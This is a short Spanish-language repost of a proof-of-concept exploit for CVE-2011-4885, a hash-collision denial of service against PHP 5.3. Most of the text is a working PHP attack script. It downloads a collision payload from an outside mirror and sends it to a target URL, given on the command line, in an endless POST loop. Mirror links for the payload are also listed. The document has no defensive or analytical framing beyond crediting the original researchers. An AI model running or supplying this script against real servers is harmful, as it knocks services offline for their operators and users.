PoC - PHP Hashtables Denial of Service

Este es uno de los exploit (Lenguaje PHP) disponibles para el ataque expuesto por   Julian | zeri y Alexander ‘alech’ Klink  en la  Chaos Communication Congress. Cortesía de Exploit-DB y confeccionado por http://www.infodox.co.cc/.

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service

Exploit

 # Date: 1/1/12

 # Author: infodox

 # Software Link: php.net

 #

Version: 5.3.*

 # Tested on: Linux

 # CVE : CVE-2011-4885

Exploit

Download -- http://infodox.co.cc/Downloads/phpdos.txt

/----------------------------------------------------/

/*

PHP 5.3.* Hash Colission DoS Exploit by infodox

Original version by itz me (opensc.ws)

CVE-2011-4885

Mirrors List:

http://www.exploit-db.com/sploits/hashcollide.txt

http://compsoc.nuigalway.ie/~infodox/hashcollide.txt

http://jrs-s.net/hashcollide.txt

http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:

Different mirror for hashcollide.txt

Now takes target as a command line argument

Status message printing

Twitter: @info_dox

Blog: blog.infodox.co.cc

Site: http://www.infodox.co.cc/

*/

$targ = $argv[1];

$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...

while(1) {

 echo "firing";

 $ch = curl_init("$targ");

 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);

 curl_exec($ch);

 curl_close($ch);

 echo "[+] Voly Sent!";

}

?>